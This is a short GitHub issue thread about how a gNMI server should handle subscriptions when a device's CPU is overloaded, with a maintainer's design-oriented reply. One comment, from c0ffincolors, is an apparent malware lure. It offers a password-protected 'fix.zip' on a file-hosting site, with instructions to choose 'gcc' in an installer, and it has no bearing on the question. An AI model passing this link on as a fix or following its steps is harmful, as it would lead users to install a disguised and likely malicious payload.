### ISSUE TITLE
Under high CPU load - gNMI subscribe response NULL 

### ISSUE THREAD

**Issue by raghubk** [openconfig/gnmi#183]
When the device CPU is overloaded, is it ok to send NULL updates in gNMI responses? Or should gNMI Server close the existing RPCs under high CPU scenarios? Thus freeing up CPU cycles taken by gNMI server and other related modules, and make the CPU available to other critical functionality to continue.

Wondering what would be the preferred way to reduce the CPU cycles taken by gNMI server.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by robshakir** [comment]
What does sending a null update mean? I don't think that this sounds a good idea -- neither does it sound like a good idea to kill RPCs (just as your device is overloaded, you would then lose telemetry). 

This sounds like a general system design problem. You need to consider: How do you decide how to schedule processes under high CPU load generally?  What are the different points of congestion in the system and where can backoff possibly be created?

These are really considerations that are beyond the scope of the specification.
